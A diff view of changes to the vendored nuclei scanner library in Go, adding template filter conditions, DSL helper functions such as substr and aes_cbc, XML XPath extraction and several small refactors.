	37	+	if !fileutil.FolderExists(dir) {
	38	+	_ = fileutil.CreateFolder(dir)
	39	+	}
	40	+	}
33	41		func getConfigDetails() (string, error) {
34	42		configDir, err := GetConfigDir()
35	43		if err != nil {
		skipped 6 lines
42	50
43	51		// GetConfigDir returns the nuclei configuration directory
44	52		func GetConfigDir() (string, error) {
45		-	home, err := homedir.Dir()
	53	+	var (
	54	+	home string
	55	+	err error
	56	+	)
	57	+	if customConfigDirectory != "" {
	58	+	home = customConfigDirectory
	59	+	return home, nil
	60	+	}
	61	+	home, err = homedir.Dir()
46	62		if err != nil {
47	63		return "", err
48	64		}
		skipped 6 lines
55	71		if err != nil {
56	72		return nil, err
57	73		}
58		-
59	74		file, err := os.Open(templatesConfigFile)
60	75		if err != nil {
61	76		return nil, err
		skipped 38 lines
100	115
101	116		// ReadIgnoreFile reads the nuclei ignore file returning blocked tags and paths
102	117		func ReadIgnoreFile() IgnoreFile {
103		-	file, err := os.Open(getIgnoreFilePath())
	118	+	file, err := os.Open(GetIgnoreFilePath())
104	119		if err != nil {
105	120		gologger.Error().Msgf("Could not read nuclei-ignore file: %s\n", err)
106	121		return IgnoreFile{}
		skipped 31 lines
138	153		return nil
139	154		}
140	155
141		-	// getIgnoreFilePath returns the ignore file path for the runner
142		-	func getIgnoreFilePath() string {
	156	+	// GetIgnoreFilePath returns the ignore file path for the runner
	157	+	func GetIgnoreFilePath() string {
143	158		var defIgnoreFilePath string
144	159
145	160		if customIgnoreFilePath != "" {
		skipped 19 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader/filter/tag_filter.go

		skipped 3 lines
4	4		"errors"
5	5		"strings"
6	6
	7	+	"github.com/Knetic/govaluate"
	8	+	"github.com/projectdiscovery/gologger"
7	9		"github.com/projectdiscovery/nuclei/v2/pkg/model/types/severity"
	10	+	"github.com/projectdiscovery/nuclei/v2/pkg/operators/common/dsl"
	11	+	"github.com/projectdiscovery/nuclei/v2/pkg/templates"
8	12		"github.com/projectdiscovery/nuclei/v2/pkg/templates/types"
9	13		)
10	14
		skipped 9 lines
20	24		excludeTypes map[types.ProtocolType]struct{}
21	25		allowedIds map[string]struct{}
22	26		excludeIds map[string]struct{}
	27	+	includeConditions map[string]*govaluate.EvaluableExpression
23	28		}
24	29
25	30		// ErrExcluded is returned for excluded templates
		skipped 4 lines
30	35		// unless it is explicitly specified by user using the includeTags (matchAllows field).
31	36		// Matching rule: (tag1 OR tag2...) AND (author1 OR author2...) AND (severity1 OR severity2...) AND (extraTags1 OR extraTags2...)
32	37		// Returns true if the template matches the filter criteria, false otherwise.
33		-	func (tagFilter *TagFilter) Match(templateTags, templateAuthors []string, templateSeverity severity.Severity, extraTags []string, templateType types.ProtocolType, templateId string) (bool, error) {
	38	+	func (tagFilter TagFilter) Match(template templates.Template, extraTags []string) (bool, error) {
	39	+	templateTags := template.Info.Tags.ToSlice()
34	40		for _, templateTag := range templateTags {
35	41		_, blocked := tagFilter.block[templateTag]
36	42		_, allowed := tagFilter.matchAllows[templateTag]
		skipped 11 lines
48	54		return false, nil
49	55		}
50	56
51		-	if !isAuthorMatch(tagFilter, templateAuthors) {
	57	+	if !isAuthorMatch(tagFilter, template.Info.Authors.ToSlice()) {
52	58		return false, nil
53	59		}
54	60
55		-	if !isSeverityMatch(tagFilter, templateSeverity) {
	61	+	if !isSeverityMatch(tagFilter, template.Info.SeverityHolder.Severity) {
56	62		return false, nil
57	63		}
58	64
59		-	if !isTemplateTypeMatch(tagFilter, templateType) {
	65	+	if !isTemplateTypeMatch(tagFilter, template.Type()) {
60	66		return false, nil
61	67		}
62	68
63		-	if !isIdMatch(tagFilter, templateId) {
	69	+	if !isIdMatch(tagFilter, strings.ToLower(template.ID)) {
	70	+	return false, nil
	71	+	}
	72	+
	73	+	if !isConditionMatch(tagFilter, template) {
64	74		return false, nil
65	75		}
66	76
		skipped 100 lines
167	177		return included && !excluded
168	178		}
169	179
	180	+	func isConditionMatch(tagFilter TagFilter, template templates.Template) bool {
	181	+	if len(tagFilter.includeConditions) == 0 {
	182	+	return true
	183	+	}
	184	+
	185	+	// attempts to unwrap fields to their basic types
	186	+	// mapping must be manual because of various abstraction layers, custom marshaling and forceful validation
	187	+	parameters := map[string]interface{}{
	188	+	"id": template.ID,
	189	+	"name": template.Info.Name,
	190	+	"description": template.Info.Description,
	191	+	"tags": template.Info.Tags.ToSlice(),
	192	+	"authors": template.Info.Authors.ToSlice(),
	193	+	"severity": template.Info.SeverityHolder.Severity.String(),
	194	+	}
	195	+	for k, v := range template.Info.Metadata {
	196	+	parameters[k] = v
	197	+	}
	198	+	for _, expr := range tagFilter.includeConditions {
	199	+	result, err := expr.Evaluate(parameters)
	200	+	// in case of errors => skip
	201	+	if err != nil {
	202	+	// Using debug as the failure here might be legitimate (eg. template not having optional metadata fields => missing required fields)
	203	+	gologger.Debug().Msgf("The expression condition couldn't be evaluated correctly for template \"%s\": %s\n", template.ID, err)
	204	+	return false
	205	+	}
	206	+	resultBool, ok := result.(bool)
	207	+	// in case the result is not boolean => skip
	208	+	if !ok {
	209	+	return false
	210	+	}
	211	+	// in case the result is false => skip
	212	+	if !resultBool {
	213	+	return false
	214	+	}
	215	+	}
	216	+
	217	+	return true
	218	+	}
	219	+
170	220		type Config struct {
171	221		Tags []string
172	222		ExcludeTags []string
		skipped 5 lines
178	228		ExcludeIds []string
179	229		Protocols types.ProtocolTypes
180	230		ExcludeProtocols types.ProtocolTypes
	231	+	IncludeConditions []string
181	232		}
182	233
183	234		// New returns a tag filter for nuclei tag based execution
184	235		//
185		-	// It takes into account Tags, Severities, ExcludeSeverities, Authors, IncludeTags, ExcludeTags.
186		-	func New(config Config) TagFilter {
	236	+	// It takes into account Tags, Severities, ExcludeSeverities, Authors, IncludeTags, ExcludeTags, Conditions.
	237	+	func New(config Config) (TagFilter, error) {
187	238		filter := &TagFilter{
188	239		allowedTags: make(map[string]struct{}),
189	240		authors: make(map[string]struct{}),
		skipped 5 lines
195	246		excludeTypes: make(map[types.ProtocolType]struct{}),
196	247		allowedIds: make(map[string]struct{}),
197	248		excludeIds: make(map[string]struct{}),
	249	+	includeConditions: make(map[string]*govaluate.EvaluableExpression),
198	250		}
199	251		for _, tag := range config.ExcludeTags {
200	252		for _, val := range splitCommaTrim(tag) {
		skipped 60 lines
261	313		delete(filter.excludeIds, val)
262	314		}
263	315		}
264		-	return filter
	316	+	for _, includeCondition := range config.IncludeConditions {
	317	+	compiled, err := govaluate.NewEvaluableExpressionWithFunctions(includeCondition, dsl.HelperFunctions)
	318	+	if err != nil {
	319	+	return nil, err
	320	+	}
	321	+	filter.includeConditions[includeCondition] = compiled
	322	+	}
	323	+	return filter, nil
265	324		}
266	325
267	326		/*
		skipped 26 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader/loader.go

		skipped 37 lines
38	38		IncludeTags []string
39	39		IncludeIds []string
40	40		ExcludeIds []string
	41	+	IncludeConditions []string
41	42
42	43		Catalog catalog.Catalog
43	44		ExecutorOptions protocols.ExecuterOptions
		skipped 35 lines
79	80		TemplatesDirectory: templateConfig.TemplatesDirectory,
80	81		Protocols: options.Protocols,
81	82		ExcludeProtocols: options.ExcludeProtocols,
	83	+	IncludeConditions: options.IncludeConditions,
82	84		Catalog: catalog,
83	85		ExecutorOptions: executerOpts,
84	86		}
		skipped 2 lines
87	89
88	90		// New creates a new template store based on provided configuration
89	91		func New(config Config) (Store, error) {
	92	+	tagFilter, err := filter.New(&filter.Config{
	93	+	Tags: config.Tags,
	94	+	ExcludeTags: config.ExcludeTags,
	95	+	Authors: config.Authors,
	96	+	Severities: config.Severities,
	97	+	ExcludeSeverities: config.ExcludeSeverities,
	98	+	IncludeTags: config.IncludeTags,
	99	+	IncludeIds: config.IncludeIds,
	100	+	ExcludeIds: config.ExcludeIds,
	101	+	Protocols: config.Protocols,
	102	+	ExcludeProtocols: config.ExcludeProtocols,
	103	+	IncludeConditions: config.IncludeConditions,
	104	+	})
	105	+	if err != nil {
	106	+	return nil, err
	107	+	}
90	108		// Create a tag filter based on provided configuration
91	109		store := &Store{
92		-	config: config,
93		-	tagFilter: filter.New(&filter.Config{
94		-	Tags: config.Tags,
95		-	ExcludeTags: config.ExcludeTags,
96		-	Authors: config.Authors,
97		-	Severities: config.Severities,
98		-	ExcludeSeverities: config.ExcludeSeverities,
99		-	IncludeTags: config.IncludeTags,
100		-	IncludeIds: config.IncludeIds,
101		-	ExcludeIds: config.ExcludeIds,
102		-	Protocols: config.Protocols,
103		-	ExcludeProtocols: config.ExcludeProtocols,
104		-	}),
	110	+	config: config,
	111	+	tagFilter: tagFilter,
105	112		pathFilter: filter.NewPathFilter(&filter.PathFilterConfig{
106	113		IncludedTemplates: config.IncludeTemplates,
107	114		ExcludedTemplates: config.ExcludeTemplates,
		skipped 159 lines
267	274		stats.Increment(parsers.RuntimeWarningsStats)
268	275		gologger.Warning().Msgf("Could not parse template %s: %s\n", templatePath, err)
269	276		} else if parsed != nil {
270		-	loadedTemplates = append(loadedTemplates, parsed)
	277	+	if len(parsed.RequestsHeadless) > 0 && !store.config.ExecutorOptions.Options.Headless {
	278	+	gologger.Warning().Msgf("Headless flag is required for headless template %s\n", templatePath)
	279	+	} else {
	280	+	loadedTemplates = append(loadedTemplates, parsed)
	281	+	}
271	282		}
272	283		} else if err != nil {
273	284		gologger.Warning().Msgf("Could not load template %s: %s\n", templatePath, err)
		skipped 40 lines
314	325		stats.Increment(parsers.RuntimeWarningsStats)
315	326		gologger.Warning().Msgf("Could not parse template %s: %s\n", templatePath, err)
316	327		} else if parsed != nil {
317		-	loadedTemplates = append(loadedTemplates, parsed)
	328	+	if len(parsed.RequestsHeadless) > 0 && !store.config.ExecutorOptions.Options.Headless {
	329	+	gologger.Warning().Msgf("Headless flag is required for headless template %s\n", templatePath)
	330	+	} else {
	331	+	loadedTemplates = append(loadedTemplates, parsed)
	332	+	}
318	333		}
319	334		} else if err != nil {
320	335		gologger.Warning().Msgf("Could not load template %s: %s\n", templatePath, err)
		skipped 5 lines

■ ■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/operators/common/dsl/dsl.go

		skipped 49 lines
50	50
51	51		var dslFunctions map[string]dslFunction
52	52
	53	+	var (
	54	+	// FunctionNames is a list of function names for expression evaluation usages
	55	+	FunctionNames []string
	56	+	// HelperFunctions is a pre-compiled list of govaluate DSL functions
	57	+	HelperFunctions map[string]govaluate.ExpressionFunction
	58	+	)
	59	+
53	60		var functionSignaturePattern = regexp.MustCompile(`(\w+)\s$(?:([\w\d,\s]+)\s+([.\w\d{}&]+))?$([\s.\w\d{}&*]+)?`)
54	61		var dateFormatRegex = regexp.MustCompile("%([A-Za-z])")
55	62
		skipped 510 lines
566	573		}
567	574		return nil, fmt.Errorf("invalid number: %T", args[0])
568	575		}),
	576	+	"substr": makeDslWithOptionalArgsFunction(
	577	+	"(str string, start int, optionalEnd int)",
	578	+	func(args ...interface{}) (interface{}, error) {
	579	+	if len(args) < 2 {
	580	+	return nil, invalidDslFunctionError
	581	+	}
	582	+	argStr := types.ToString(args[0])
	583	+	start, err := strconv.Atoi(types.ToString(args[1]))
	584	+	if err != nil {
	585	+	return nil, errors.Wrap(err, "invalid start position")
	586	+	}
	587	+	if len(args) == 2 {
	588	+	return argStr[start:], nil
	589	+	}
	590	+
	591	+	end, err := strconv.Atoi(types.ToString(args[2]))
	592	+	if err != nil {
	593	+	return nil, errors.Wrap(err, "invalid end position")
	594	+	}
	595	+	if end < 0 {
	596	+	end += len(argStr)
	597	+	}
	598	+	return argStr[start:end], nil
	599	+	},
	600	+	),
	601	+	"aes_cbc": makeDslFunction(2, func(args ...interface{}) (interface{}, error) {
	602	+	key := []byte(types.ToString(args[0]))
	603	+	cleartext := []byte(types.ToString(args[1]))
	604	+	block, _ := aes.NewCipher(key)
	605	+	blockSize := block.BlockSize()
	606	+	n := blockSize - len(cleartext)%blockSize
	607	+	temp := bytes.Repeat([]byte{byte(n)}, n)
	608	+	cleartext = append(cleartext, temp...)
	609	+	iv := make([]byte, 16)
	610	+	if _, err := crand.Read(iv); err != nil {
	611	+	return nil, err
	612	+	}
	613	+	blockMode := cipher.NewCBCEncrypter(block, iv)
	614	+	ciphertext := make([]byte, len(cleartext))
	615	+	blockMode.CryptBlocks(ciphertext, cleartext)
	616	+	ciphertext = append(iv, ciphertext...)
	617	+	return ciphertext, nil
	618	+	}),
569	619		"aes_gcm": makeDslFunction(2, func(args ...interface{}) (interface{}, error) {
570	620		key := args[0].(string)
571	621		value := args[1].(string)
		skipped 20 lines
592	642		for funcName, dslFunc := range tempDslFunctions {
593	643		dslFunctions[funcName] = dslFunc(funcName)
594	644		}
	645	+	HelperFunctions = helperFunctions()
	646	+	FunctionNames = make([]string, 0, len(HelperFunctions))
	647	+	for k := range HelperFunctions {
	648	+	FunctionNames = append(FunctionNames, k)
	649	+	}
595	650		}
596	651
597	652		func makeDslWithOptionalArgsFunction(signaturePart string, dslFunctionLogic govaluate.ExpressionFunction) func(functionName string) dslFunction {
		skipped 28 lines
626	681		return fmt.Sprintf("(%s interface{}) interface{}", strings.Join(params, ", "))
627	682		}
628	683
629		-	// HelperFunctions returns the dsl helper functions
630		-	func HelperFunctions() map[string]govaluate.ExpressionFunction {
	684	+	// helperFunctions returns the dsl helper functions
	685	+	func helperFunctions() map[string]govaluate.ExpressionFunction {
631	686		helperFunctions := make(map[string]govaluate.ExpressionFunction, len(dslFunctions))
632	687
633	688		for functionName, dslFunction := range dslFunctions {
		skipped 5 lines
639	694		}
640	695
641	696		// AddHelperFunction allows creation of additional helper functions to be supported with templates
	697	+	//
642	698		//goland:noinspection GoUnusedExportedFunction
643	699		func AddHelperFunction(key string, value func(args ...interface{}) (interface{}, error)) error {
644	700		if _, ok := dslFunctions[key]; !ok {
		skipped 175 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/operators/extractors/compile.go

		skipped 42 lines
43	43		}
44	44
45	45		for _, dslExp := range e.DSL {
46		-	compiled, err := govaluate.NewEvaluableExpressionWithFunctions(dslExp, dsl.HelperFunctions())
	46	+	compiled, err := govaluate.NewEvaluableExpressionWithFunctions(dslExp, dsl.HelperFunctions)
47	47		if err != nil {
48	48		return fmt.Errorf("could not compile dsl: %s", dslExp)
49	49		}
		skipped 15 lines

■ ■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/operators/extractors/extract.go

		skipped 2 lines
3	3		import (
4	4		"encoding/json"
5	5		"fmt"
6		-	"strings"
7		-
8	6		"github.com/antchfx/htmlquery"
	7	+	"github.com/antchfx/xmlquery"
	8	+	"strings"
9	9
10	10		"github.com/projectdiscovery/nuclei/v2/pkg/types"
11	11		)
		skipped 47 lines
59	59		return results
60	60		}
61	61
62		-	// ExtractHTML extracts items from text using XPath selectors
	62	+	// ExtractXPath extracts items from text using XPath selectors
	63	+	func (e *Extractor) ExtractXPath(corpus string) map[string]struct{} {
	64	+	if strings.HasPrefix(corpus, "<?xml") {
	65	+	return e.ExtractXML(corpus)
	66	+	}
	67	+	return e.ExtractHTML(corpus)
	68	+	}
	69	+
	70	+	// ExtractHTML extracts items from HTML using XPath selectors
63	71		func (e *Extractor) ExtractHTML(corpus string) map[string]struct{} {
64	72		results := make(map[string]struct{})
65	73
		skipped 13 lines
79	87		value = htmlquery.SelectAttr(node, e.Attribute)
80	88		} else {
81	89		value = htmlquery.InnerText(node)
	90	+	}
	91	+	if _, ok := results[value]; !ok {
	92	+	results[value] = struct{}{}
	93	+	}
	94	+	}
	95	+	}
	96	+	return results
	97	+	}
	98	+
	99	+	// ExtractXML extracts items from XML using XPath selectors
	100	+	func (e *Extractor) ExtractXML(corpus string) map[string]struct{} {
	101	+	results := make(map[string]struct{})
	102	+
	103	+	doc, err := xmlquery.Parse(strings.NewReader(corpus))
	104	+	if err != nil {
	105	+	return results
	106	+	}
	107	+
	108	+	for _, k := range e.XPath {
	109	+	nodes, err := xmlquery.QueryAll(doc, k)
	110	+	if err != nil {
	111	+	continue
	112	+	}
	113	+	for _, node := range nodes {
	114	+	var value string
	115	+
	116	+	if e.Attribute != "" {
	117	+	value = node.SelectAttr(e.Attribute)
	118	+	} else {
	119	+	value = node.InnerText()
82	120		}
83	121		if _, ok := results[value]; !ok {
84	122		results[value] = struct{}{}
		skipped 63 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/operators/matchers/compile.go

		skipped 61 lines
62	62
63	63		// Compile the dsl expressions
64	64		for _, dslExpression := range matcher.DSL {
65		-	compiledExpression, err := govaluate.NewEvaluableExpressionWithFunctions(dslExpression, dsl.HelperFunctions())
	65	+	compiledExpression, err := govaluate.NewEvaluableExpressionWithFunctions(dslExpression, dsl.HelperFunctions)
66	66		if err != nil {
67	67		return &DslCompilationError{DslSignature: dslExpression, WrappedError: err}
68	68		}
		skipped 37 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/operators/matchers/match.go

		skipped 172 lines
173	173		logExpressionEvaluationFailure(matcher.Name, err)
174	174		return false
175	175		}
176		-	expression, err = govaluate.NewEvaluableExpressionWithFunctions(resolvedExpression, dsl.HelperFunctions())
	176	+	expression, err = govaluate.NewEvaluableExpressionWithFunctions(resolvedExpression, dsl.HelperFunctions)
177	177		if err != nil {
178	178		logExpressionEvaluationFailure(matcher.Name, err)
179	179		return false
		skipped 43 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/parsers/parser.go

		skipped 8 lines
9	9
10	10		"github.com/projectdiscovery/nuclei/v2/pkg/catalog"
11	11		"github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader/filter"
12		-	"github.com/projectdiscovery/nuclei/v2/pkg/model"
13	12		"github.com/projectdiscovery/nuclei/v2/pkg/templates"
14	13		"github.com/projectdiscovery/nuclei/v2/pkg/templates/cache"
15		-	"github.com/projectdiscovery/nuclei/v2/pkg/templates/types"
16	14		"github.com/projectdiscovery/nuclei/v2/pkg/utils"
17	15		"github.com/projectdiscovery/nuclei/v2/pkg/utils/stats"
18	16		)
		skipped 19 lines
38	36		return false, validationError
39	37		}
40	38
41		-	templateId := strings.ToLower(template.ID)
42		-
43		-	return isTemplateInfoMetadataMatch(tagFilter, &template.Info, extraTags, template.Type(), templateId)
	39	+	return isTemplateInfoMetadataMatch(tagFilter, template, extraTags)
44	40		}
45	41
46	42		// LoadWorkflow returns true if the workflow is valid and matches the filtering criteria.
		skipped 13 lines
60	56		return false, nil
61	57		}
62	58
63		-	func isTemplateInfoMetadataMatch(tagFilter filter.TagFilter, templateInfo model.Info, extraTags []string, templateType types.ProtocolType, templateId string) (bool, error) {
64		-	templateTags := templateInfo.Tags.ToSlice()
65		-	templateAuthors := templateInfo.Authors.ToSlice()
66		-	templateSeverity := templateInfo.SeverityHolder.Severity
67		-
68		-	match, err := tagFilter.Match(templateTags, templateAuthors, templateSeverity, extraTags, templateType, templateId)
	59	+	func isTemplateInfoMetadataMatch(tagFilter filter.TagFilter, template templates.Template, extraTags []string) (bool, error) {
	60	+	match, err := tagFilter.Match(template, extraTags)
69	61
70	62		if err == filter.ErrExcluded {
71	63		return false, filter.ErrExcluded
		skipped 77 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/parsers/workflow_loader.go

		skipped 14 lines
15	15
16	16		// NewLoader returns a new workflow loader structure
17	17		func NewLoader(options *protocols.ExecuterOptions) (model.WorkflowLoader, error) {
18		-	tagFilter := filter.New(&filter.Config{
19		-	Tags: options.Options.Tags,
20		-	ExcludeTags: options.Options.ExcludeTags,
21		-	Authors: options.Options.Authors,
22		-	Severities: options.Options.Severities,
23		-	IncludeTags: options.Options.IncludeTags,
24		-	IncludeIds: options.Options.IncludeIds,
25		-	ExcludeIds: options.Options.ExcludeIds,
	18	+	tagFilter, err := filter.New(&filter.Config{
	19	+	Tags: options.Options.Tags,
	20	+	ExcludeTags: options.Options.ExcludeTags,
	21	+	Authors: options.Options.Authors,
	22	+	Severities: options.Options.Severities,
	23	+	IncludeTags: options.Options.IncludeTags,
	24	+	IncludeIds: options.Options.IncludeIds,
	25	+	ExcludeIds: options.Options.ExcludeIds,
	26	+	IncludeConditions: options.Options.IncludeConditions,
26	27		})
	28	+	if err != nil {
	29	+	return nil, err
	30	+	}
27	31		pathFilter := filter.NewPathFilter(&filter.PathFilterConfig{
28	32		IncludedTemplates: options.Options.IncludeTemplates,
29	33		ExcludedTemplates: options.Options.ExcludedTemplates,
30	34		}, options.Catalog)
	35	+
31	36		return &workflowLoader{pathFilter: pathFilter, tagFilter: tagFilter, options: options}, nil
32	37		}
33	38
		skipped 32 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/projectfile/httputil.go

		skipped 5 lines
6	6		"encoding/gob"
7	7		"encoding/hex"
8	8		"io"
9		-	"io/ioutil"
10	9		"net/http"
11	10		)
12	11
		skipped 92 lines
105	104		StatusCode: intResp.StatusCode,
106	105		Header: intResp.Headers,
107	106		ContentLength: contentLength,
108		-	Body: ioutil.NopCloser(bytes.NewReader(intResp.Body)),
	107	+	Body: io.NopCloser(bytes.NewReader(intResp.Body)),
109	108		}
110	109		}
111	110

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/automaticscan/automaticscan.go

		skipped 1 lines
2	2
3	3		import (
4	4		"io"
5		-	"io/ioutil"
6	5		"net/http"
7	6		"os"
8	7		"path/filepath"
		skipped 10 lines
19	18		"github.com/projectdiscovery/nuclei/v2/pkg/templates"
20	19		"github.com/projectdiscovery/nuclei/v2/pkg/templates/types"
21	20		"github.com/projectdiscovery/retryablehttp-go"
	21	+	"github.com/projectdiscovery/sliceutil"
22	22		wappalyzer "github.com/projectdiscovery/wappalyzergo"
23	23		"gopkg.in/yaml.v2"
24	24		)
		skipped 134 lines
159	159		return
160	160		}
161	161		reader := io.LimitReader(resp.Body, maxDefaultBody)
162		-	data, err := ioutil.ReadAll(reader)
	162	+	data, err := io.ReadAll(reader)
163	163		if err != nil {
164	164		resp.Body.Close()
165	165		return
		skipped 30 lines
196	196		if len(items) == 0 {
197	197		return
198	198		}
199		-	uniqueTags := uniqueSlice(items)
	199	+	uniqueTags := sliceutil.Dedupe(items)
200	200
201	201		templatesList := s.store.LoadTemplatesWithTags(s.allTemplates, uniqueTags)
202	202		gologger.Info().Msgf("Executing tags (%v) for host %s (%d templates)", strings.Join(uniqueTags, ","), input, len(templatesList))
		skipped 19 lines
222	222		return strings.ToLower(appName)
223	223		}
224	224
225		-	func uniqueSlice(slice []string) []string {
226		-	data := make(map[string]struct{}, len(slice))
227		-	for _, item := range slice {
228		-	if _, ok := data[item]; !ok {
229		-	data[item] = struct{}{}
230		-	}
231		-	}
232		-	finalSlice := make([]string, 0, len(data))
233		-	for item := range data {
234		-	finalSlice = append(finalSlice, item)
235		-	}
236		-	return finalSlice
237		-	}
238		-

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions/expressions.go

		skipped 39 lines
40	40		// - simple: containing base values keys (variables)
41	41		// - complex: containing helper functions [ + variables]
42	42		// literals like {{2+2}} are not considered expressions
43		-	expressions := findExpressions(data, marker.ParenthesisOpen, marker.ParenthesisClose, mergeFunctions(dsl.HelperFunctions(), mapToFunctions(base)))
	43	+	expressions := findExpressions(data, marker.ParenthesisOpen, marker.ParenthesisClose, base)
44	44		for _, expression := range expressions {
45	45		// replace variable placeholders with base values
46	46		expression = replacer.Replace(expression, base)
47	47		// turns expressions (either helper functions+base values or base values)
48		-	compiled, err := govaluate.NewEvaluableExpressionWithFunctions(expression, dsl.HelperFunctions())
	48	+	compiled, err := govaluate.NewEvaluableExpressionWithFunctions(expression, dsl.HelperFunctions)
49	49		if err != nil {
50	50		continue
51	51		}
		skipped 11 lines
63	63		// maxIterations to avoid infinite loop
64	64		const maxIterations = 250
65	65
66		-	func findExpressions(data, OpenMarker, CloseMarker string, functions map[string]govaluate.ExpressionFunction) []string {
	66	+	func findExpressions(data, OpenMarker, CloseMarker string, base map[string]interface{}) []string {
67	67		var (
68	68		iterations int
69	69		exps []string
		skipped 30 lines
100	100		indexCloseMarkerOffset = indexCloseMarker + len(CloseMarker)
101	101
102	102		potentialMatch = innerData[indexOpenMarkerOffset:indexCloseMarker]
103		-	if isExpression(potentialMatch, functions) {
	103	+	if isExpression(potentialMatch, base) {
104	104		closeMarkerFound = true
105	105		shouldSearchCloseMarker = false
106	106		exps = append(exps, potentialMatch)
		skipped 13 lines
120	120		return exps
121	121		}
122	122
123		-	func hasLiteralsOnly(data string) bool {
124		-	expr, err := govaluate.NewEvaluableExpressionWithFunctions(data, dsl.HelperFunctions())
125		-	if err == nil && expr != nil {
126		-	_, err = expr.Evaluate(nil)
127		-	return err == nil
128		-	}
129		-	return true
130		-	}
131		-
132		-	func isExpression(data string, functions map[string]govaluate.ExpressionFunction) bool {
	123	+	func isExpression(data string, base map[string]interface{}) bool {
133	124		if _, err := govaluate.NewEvaluableExpression(data); err == nil {
134		-	return stringsutil.ContainsAny(data, getFunctionsNames(functions)...)
135		-	}
136		-
137		-	// check if it's a complex expression
138		-	_, err := govaluate.NewEvaluableExpressionWithFunctions(data, dsl.HelperFunctions())
139		-	return err == nil
140		-	}
141		-
142		-	func mapToFunctions(vars map[string]interface{}) map[string]govaluate.ExpressionFunction {
143		-	f := make(map[string]govaluate.ExpressionFunction)
144		-	for k := range vars {
145		-	f[k] = nil
146		-	}
147		-	return f
148		-	}
149		-
150		-	func mergeFunctions(m ...map[string]govaluate.ExpressionFunction) map[string]govaluate.ExpressionFunction {
151		-	o := make(map[string]govaluate.ExpressionFunction)
152		-	for _, mm := range m {
153		-	for k, v := range mm {
154		-	o[k] = v
	125	+	if stringsutil.ContainsAny(data, getFunctionsNames(base)...) {
	126	+	return true
	127	+	} else if stringsutil.ContainsAny(data, dsl.FunctionNames...) {
	128	+	return true
155	129		}
	130	+	return false
156	131		}
157		-	return o
	132	+	_, err := govaluate.NewEvaluableExpressionWithFunctions(data, dsl.HelperFunctions)
	133	+	return err == nil
158	134		}
159	135
160		-	func getFunctionsNames(m map[string]govaluate.ExpressionFunction) []string {
161		-	var keys []string
	136	+	func getFunctionsNames(m map[string]interface{}) []string {
	137	+	keys := make([]string, 0, len(m))
162	138		for k := range m {
163	139		keys = append(keys, k)
164	140		}
		skipped 3 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions/variables.go

		skipped 3 lines
4	4		"errors"
5	5		"regexp"
6	6		"strings"
	7	+
	8	+	"github.com/Knetic/govaluate"
	9	+	"github.com/projectdiscovery/nuclei/v2/pkg/operators/common/dsl"
7	10		)
8	11
9	12		var (
		skipped 102 lines
112	115		return nil
113	116		}
114	117
	118	+	func hasLiteralsOnly(data string) bool {
	119	+	expr, err := govaluate.NewEvaluableExpressionWithFunctions(data, dsl.HelperFunctions)
	120	+	if err == nil && expr != nil {
	121	+	_, err = expr.Evaluate(nil)
	122	+	return err == nil
	123	+	}
	124	+	return true
	125	+	}
	126	+

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/helpers/eventcreator/eventcreator.go

1	1		package eventcreator
2	2
3	3		import (
	4	+	"github.com/projectdiscovery/gologger"
4	5		"github.com/projectdiscovery/nuclei/v2/pkg/operators"
5	6		"github.com/projectdiscovery/nuclei/v2/pkg/output"
6	7		"github.com/projectdiscovery/nuclei/v2/pkg/protocols"
	8	+	"github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/utils/vardump"
7	9		)
8	10
9	11		// CreateEvent wraps the outputEvent with the result of the operators defined on the request
		skipped 6 lines
16	18		func CreateEventWithAdditionalOptions(request protocols.Request, outputEvent output.InternalEvent, isResponseDebug bool,
17	19		addAdditionalOptions func(internalWrappedEvent output.InternalWrappedEvent)) output.InternalWrappedEvent {
18	20		event := &output.InternalWrappedEvent{InternalEvent: outputEvent}
	21	+
	22	+	// Dump response variables if ran in debug mode
	23	+	if isResponseDebug {
	24	+	gologger.Debug().Msgf("Protocol response variables: \n%s\n", vardump.DumpVariables(outputEvent))
	25	+	}
19	26		for _, compiledOperator := range request.GetCompiledOperators() {
20	27		if compiledOperator != nil {
21	28		result, ok := compiledOperator.Execute(outputEvent, request.Match, request.Extract, isResponseDebug)
		skipped 19 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/interactsh/interactsh.go

		skipped 44 lines
45	45		pollDuration time.Duration
46	46		cooldownDuration time.Duration
47	47
48		-	dataMutex *sync.RWMutex
49		-
50		-	hostname string
51		-
	48	+	hostname string
52	49		firstTimeGroup sync.Once
53	50		generated uint32 // decide to wait if we have a generated url
54	51		matched bool
	52	+	IsClosed bool
55	53		}
56	54
57	55		var (
		skipped 3 lines
61	59
62	60		const (
63	61		stopAtFirstMatchAttribute = "stop-at-first-match"
64		-	templateIdAttribute = "template-id"
	62	+	templateIdAttribute = "template-id"
65	63		)
66	64
67	65		// Options contains configuration options for interactsh nuclei integration.
		skipped 50 lines
118	116		interactshURLCache := ccache.New(ccache.Configure().MaxSize(defaultMaxInteractionsCount))
119	117
120	118		interactClient := &Client{
	119	+	IsClosed:false,
121	120		eviction: options.Eviction,
122	121		interactions: interactionsCache,
123	122		matchedTemplates: matchedTemplateCache,
		skipped 2 lines
126	125		requests: cache,
